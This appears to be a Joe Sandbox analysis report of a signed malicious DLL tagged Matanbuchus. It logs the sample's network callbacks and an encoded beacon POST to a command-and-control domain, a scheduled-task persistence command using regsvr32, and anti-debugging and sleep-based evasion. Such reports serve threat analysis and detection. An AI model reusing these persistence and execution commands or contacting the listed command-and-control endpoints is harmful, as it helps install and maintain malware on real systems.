Windows Analysis Report
smphost.dll

Overview

General Information

Sample Name:	smphost.dll
Analysis ID:	562835
MD5:	fc484855692f2a7d1eae090086a1eb72
SHA1:	2e9103747750b40835f58d9e57c2ab75eeaf25f6
SHA256:	e58b9bbb7bcdf3e901453b7b9c9e514fed1e53565e3280353dccc77cde26a98e
Tags:	dllmatanbuchusSATURNCONSULTANCYLTDsigned
Infos:

Detection

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Sigma detected: Schedule system process

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Uses known network protocols on non-standard ports

Sigma detected: Regsvr32 Network Activity

Sigma detected: Suspicious Call by Ordinal

Uses schtasks.exe or at.exe to add and modify task schedules

Uses 32bit PE files

Drops PE files to the application program directory (C:\ProgramData)

One or more processes crash

Contains functionality to check if a debugger is running (IsDebuggerPresent)

May sleep (evasive loops) to hinder dynamic analysis

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Detected TCP or UDP traffic on non-standard ports

Checks if the current process is being debugged

Registers a DLL

Dropped file seen in connection with other malware

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Classification

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: smphost.dll

Virustotal: Detection: 8%

Perma Link

Antivirus detection for URL or domain

Source: http://manageintel.com/WUzZRUBQje/Auth.php

Avira URL Cloud: Label: malware

Compliance

Uses 32bit PE files

Source: smphost.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE

Source: unknown	HTTPS traffic detected: 185.14.31.158:443 -> 192.168.2.3:49831 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 93.93.131.124:443 -> 192.168.2.3:49837 version: TLS 1.2

Source: smphost.dll

Static PE information: certificate valid

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9EED8A FindFirstFileExW,		0_2_6E9EED8A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 25_2_6F6CED8A FindFirstFileExW,		25_2_6F6CED8A

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\regsvr32.exe	Domain query: the.earth.li
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 185.14.31.158 32710	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 93.93.131.124 187	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Domain query: manageintel.com

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49840

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: ITLDC-NLUA ITLDC-NLUA

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/QXms.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /~sgtatham/putty/latest/w64/putty.exe HTTP/1.1Host: the.earth.liCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /~sgtatham/putty/0.76/w64/putty.exe HTTP/1.1Host: the.earth.liCache-Control: no-cacheConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 93.93.131.124 93.93.131.124

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.3:49835 -> 185.14.31.158:32710

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833

Source: loaddll32.exe, loaddll32.exe, 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp, regsvr32.exe	String found in binary or memory: https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/BhJM.xml
Source: loaddll32.exe, loaddll32.exe, 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp, regsvr32.exe	String found in binary or memory: https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/QXms.xml

Source: unknown

HTTP traffic detected: POST /WUzZRUBQje/Auth.php HTTP/1.1User-Agent: Windows-AzureAD-Authentication-Provider/11.0Host: manageintel.comContent-Length: 549Content-Type: application/x-www-form-urlencodedAccept-Language: en-USData Raw: 61 75 74 68 3d 65 79 49 7a 51 30 56 72 49 6a 6f 69 56 33 4a 47 65 44 6c 68 55 45 73 31 64 30 35 6a 54 31 56 57 52 6b 78 47 55 32 74 6d 51 6c 6c 4c 4d 30 78 6a 59 56 4e 6c 5a 31 4e 45 53 6b 70 50 56 7a 52 35 56 31 45 33 4d 30 77 79 52 6e 64 71 4b 32 34 77 50 53 49 73 49 6a 4e 6d 5a 54 45 78 49 6a 6f 69 53 79 73 30 4f 47 39 52 50 54 30 69 4c 43 49 7a 62 54 64 34 49 6a 6f 69 56 58 4a 30 62 79 74 68 52 54 30 69 4c 43 49 31 5a 47 56 69 4f 57 4d 69 4f 69 4a 4a 64 54 41 35 63 43 39 79 56 69 49 73 49 6b 52 54 4d 6e 67 69 4f 69 4a 4b 5a 58 4e 73 4d 48 46 68 56 79 49 73 49 6b 56 4d 61 69 49 36 49 6c 56 78 62 47 63 77 63 58 46 50 4d 30 56 7a 55 53 49 73 49 6b 56 76 4e 69 49 36 49 6c 68 79 4e 58 67 34 59 55 55 39 49 69 77 69 52 6e 52 76 49 6a 6f 69 53 6e 63 39 50 53 49 73 49 6c 45 32 57 44 59 69 4f 69 4a 57 57 6e 42 4d 4d 6c 70 74 63 53 74 6e 50 54 30 69 4c 43 4a 55 51 55 31 6d 62 53 49 36 57 79 4a 58 53 58 52 36 4b 7a 55 72 61 7a 56 57 61 79 74 4c 64 7a 30 39 49 6c 30 73 49 6d 4e 43 52 69 49 36 49 6c 5a 77 64 32 38 78 64 6e 5a 51 4f 54 4a 6f 55 6c 46 6f 64 32 46 6c 65 6d 70 6b 5a 45 68 7a 50 53 49 73 49 6d 55 77 4d 32 56 6b 49 6a 6f 69 56 55 39 57 57 6e 67 32 59 55 30 77 56 56 56 4d 51 31 68 61 61 30 31 42 4b 32 35 6d 62 57 64 50 65 55 74 6e 4e 47 56 68 4f 56 68 55 54 6b 4a 4f 55 32 56 4d 56 45 4e 6d 57 54 30 69 4c 43 4a 6d 4d 57 52 68 49 6a 6f 69 56 44 52 4f 51 6a 46 61 65 58 41 30 56 31 56 7a 56 6e 67 77 52 32 5a 35 61 6b 68 43 5a 7a 51 39 49 69 77 69 64 31 41 32 49 6a 6f 69 57 6d 55 30 63 6d 38 72 53 46 49 69 4c 43 4a 33 5a 32 70 32 49 6a 6f 69 57 6b 78 6f 64 6a 56 6e 50 54 30 69 4c 43 4a 36 61 30 4d 33 49 6a 6f 69 49 6e 30 3d Data Ascii: auth=eyIzQ0VrIjoiV3JGeDlhUEs1d05jT1VWRkxGU2tmQllLM0xjYVNlZ1NESkpPVzR5V1E3M0wyRndqK24wPSIsIjNmZTExIjoiSys0OG9RPT0iLCIzbTd4IjoiVXJ0bythRT0iLCI1ZGViOWMiOiJJdTA5cC9yViIsIkRTMngiOiJKZXNsMHFhVyIsIkVMaiI6IlVxbGcwcXFPM0VzUSIsIkVvNiI6IlhyNXg4YUU9IiwiRnRvIjoiSnc9PSIsIlE2WDYiOiJWWnBMMlptcStnPT0iLCJUQU1mbSI6WyJXSXR6KzUrazVWaytLdz09Il0sImNCRiI6IlZwd28xdnZQOTJoUlFod2FlempkZEhzPSIsImUwM2VkIjoiVU9WWng2YU0wVVVMQ1haa01BK25mbWdPeUtnNGVhOVhUTkJOU2VMVENmWT0iLCJmMWRhIjoiVDROQjFaeXA0V1VzVngwR2Z5akhCZzQ9Iiwid1A2IjoiWmU0cm8rSFIiLCJ3Z2p2IjoiWkxodjVnPT0iLCJ6a0M3IjoiIn0=

Source: unknown

DNS traffic detected: queries for: manageintel.com

Source: global traffic	HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/QXms.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /~sgtatham/putty/latest/w64/putty.exe HTTP/1.1Host: the.earth.liCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /~sgtatham/putty/0.76/w64/putty.exe HTTP/1.1Host: the.earth.liCache-Control: no-cacheConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache

Source: unknown	HTTPS traffic detected: 185.14.31.158:443 -> 192.168.2.3:49831 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 93.93.131.124:443 -> 192.168.2.3:49837 version: TLS 1.2

System Summary

Uses 32bit PE files

Source: smphost.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE

One or more processes crash

Source: C:\Windows\SysWOW64\regsvr32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6260 -s 2076

Detected potential crypto function

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9F3EB6	0_2_6E9F3EB6
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9E8C90	0_2_6E9E8C90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 25_2_6F6D3EB6	25_2_6F6D3EB6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 25_2_6F6C8C90	25_2_6F6C8C90

Found potential string decryption / allocating functions

Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 6E9E9960 appears 34 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 6F6C9960 appears 34 times

Tries to load missing DLLs

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\ProgramData\6\5507.ocx E58B9BBB7BCDF3E901453B7B9C9E514FED1E53565E3280353DCCC77CDE26A98E

Source: smphost.dll

Virustotal: Detection: 8%

Source: smphost.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\smphost.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\smphost.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllInstall
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllRegisterServer
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllUnregisterServer
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -e C:\ProgramData\6\5507.ocx
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6260 -s 2076
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\smphost.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllInstall	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllUnregisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -e C:\ProgramData\6\5507.ocx	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERFB43.tmp

Jump to behavior

Source: classification engine

Classification label: mal88.troj.evad.winDLL@19/7@5/2

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E9E8630 DllInstall,FormatMessageA,TextOutW,TextOutA,FormatMessageW,CoInitialize,OleInitialize,CoCreateInstance,CoGetCallerTID,FlattenPath,CreatePopupMenu,GetProductInfo,SetFileAttributesW,CharNextW,SHGetThreadRef,DceErrorInqTextA,GetConsoleCP,UuidCreate,GetMessageTime,GetVersion,GetPriorityClass,GetProcessId,IsTokenRestricted,RevertToSelf,RpcExceptionFilter,CveEventWrite,CoCancelCall,CoTaskMemAlloc,GetSidIdentifierAuthority,DisableThreadLibraryCalls,IsValidAcl,IsValidSid,CreateMutexExW,SHStrDupW,SHStrDupA,DuplicateIcon,

0_2_6E9E8630

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6260
Source: C:\Windows\SysWOW64\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\computer

Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: smphost.dll

Static PE information: certificate valid

Source: smphost.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: smphost.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: smphost.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: smphost.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: smphost.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: smphost.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: smphost.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: smphost.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: smphost.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: smphost.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: smphost.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: smphost.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Registers a DLL

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\smphost.dll

Persistence and Installation Behavior

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Windows\SysWOW64\regsvr32.exe

File created: C:\ProgramData\6\5507.ocx

Jump to dropped file

Drops PE files

Source: C:\Windows\SysWOW64\regsvr32.exe

File created: C:\ProgramData\6\5507.ocx

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\regsvr32.exe

Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49840

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4604	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4604	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4604	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2008	Thread sleep time: -54000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\loaddll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\regsvr32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\regsvr32.exe	Last function: Thread delayed

Found large amount of non-executed APIs

Source: C:\Windows\System32\loaddll32.exe	API coverage: 6.8 %
Source: C:\Windows\SysWOW64\regsvr32.exe	API coverage: 6.3 %

Source: C:\Windows\SysWOW64\regsvr32.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9EED8A FindFirstFileExW,		0_2_6E9EED8A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 25_2_6F6CED8A FindFirstFileExW,		25_2_6F6CED8A

Source: C:\Windows\System32\loaddll32.exe	Thread delayed: delay time: 120000			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Thread delayed: delay time: 30000			Jump to behavior

Source: regsvr32.exe, 00000003.00000003.524171226.0000000005247000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.523620825.0000000005151000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.518162902.0000000005151000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.511554101.0000000005051000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 7qAJTueJV05Xwegg6bMAAApTi10HgfsAbFhzMiq3oTtaEegJyQAAWY/AdTfkf4tG
Source: regsvr32.exe, 00000003.00000003.524171226.0000000005247000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.523620825.0000000005151000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bVf2XmkyVwC+WwEAAI1F4FpWU1dl//91iQ4iqeMuV07UhiCL+IN94AoPhboPAACF

Anti Debugging

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E9E9CF7 IsDebuggerPresent,OutputDebugStringW,

0_2_6E9E9CF7

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E9EFE17 GetProcessHeap,

0_2_6E9EFE17

Contains functionality to read the PEB

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9E1710 mov eax, dword ptr fs:[00000030h]	0_2_6E9E1710
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9E1490 mov eax, dword ptr fs:[00000030h]	0_2_6E9E1490
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9E83B0 mov eax, dword ptr fs:[00000030h]	0_2_6E9E83B0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9EC865 mov eax, dword ptr fs:[00000030h]	0_2_6E9EC865
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9EE9B4 mov eax, dword ptr fs:[00000030h]	0_2_6E9EE9B4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 25_2_6F6C1710 mov eax, dword ptr fs:[00000030h]	25_2_6F6C1710
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 25_2_6F6C1490 mov eax, dword ptr fs:[00000030h]	25_2_6F6C1490
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 25_2_6F6C83B0 mov eax, dword ptr fs:[00000030h]	25_2_6F6C83B0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 25_2_6F6CE9B4 mov eax, dword ptr fs:[00000030h]	25_2_6F6CE9B4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 25_2_6F6CC865 mov eax, dword ptr fs:[00000030h]	25_2_6F6CC865

Checks if the current process is being debugged

Source: C:\Windows\SysWOW64\regsvr32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9E9AED SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6E9E9AED
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9EC0A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6E9EC0A3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9E9839 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6E9E9839
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 25_2_6F6C9AED SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	25_2_6F6C9AED
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 25_2_6F6C9839 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	25_2_6F6C9839
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 25_2_6F6CC0A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	25_2_6F6CC0A3

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\regsvr32.exe	Domain query: the.earth.li
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 185.14.31.158 32710	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 93.93.131.124 187	Jump to behavior
